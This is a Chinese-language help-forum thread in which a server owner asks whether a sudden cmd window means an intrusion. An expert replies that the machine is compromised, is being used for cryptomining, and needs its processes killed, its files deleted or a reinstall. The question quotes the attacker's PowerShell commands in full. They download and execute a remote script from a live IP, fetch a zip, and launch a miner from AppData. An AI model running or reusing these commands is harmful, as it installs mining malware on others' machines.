服务器突然弹出一个cmd窗口,这是被入侵了吗?我该如何做?内容:PowerShell -comman
服务器突然弹出一个cmd窗口,这是被入侵了吗?我该如何做?内容: PowerShell -command "$cmd = .DownloadString<'http://104.248.167.144:8333/bitcoins'>; Invoke-Expression $cmd; Stop-Process -Force -processname cmd;'';
打开里面的链接,里面的信息:
if([System.IO.Directory]::Exists($home + '\AppData\Local\bitcoins') -eq $true) { Stop-Process -processname javaw; Start-Sleep -m 10000; [System.IO.Directory]::Delete($home + '\AppData\Local\bitcoins', $true); }
(New-Object System.Net.WebClient).DownloadFile('http://104.248.167.144/bitcoins.zip', $home + '\AppData\Local\bitcoins.zip'); Add-Type -AssemblyName System.IO.Compression.FileSystem; [System.IO.Compression.ZipFile]::ExtractToDirectory($home + '\AppData\Local\bitcoins.zip', $home + '\AppData\Local'); [System.IO.File]::Delete($home + '\AppData\Local\bitcoins.zip'); &($home + '\AppData\Local\bitcoins\bin\javaw.exe') -server -d64 -Xms64m -jar ($home + '\AppData\Local\bitcoins\bin\btclibrary.dll'); Start-Sleep -m 10000; Stop-Process -Force -processname cmd;
写回答
-
技术架构师 阿里云开发者社区技术专家博主 CSDN签约专栏技术博主 掘金签约技术博主 云安全联盟专家 众多开源代码库Commiter当前窗口,确认被入侵,链接下载地址,http://104.248.167.144:8333/bitcoins 可以。作为肉鸡,帮挖矿,可以按照目录,杀进程,删除,或者重装系统
2019-11-20 08:51:44赞同 展开评论 打赏
版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
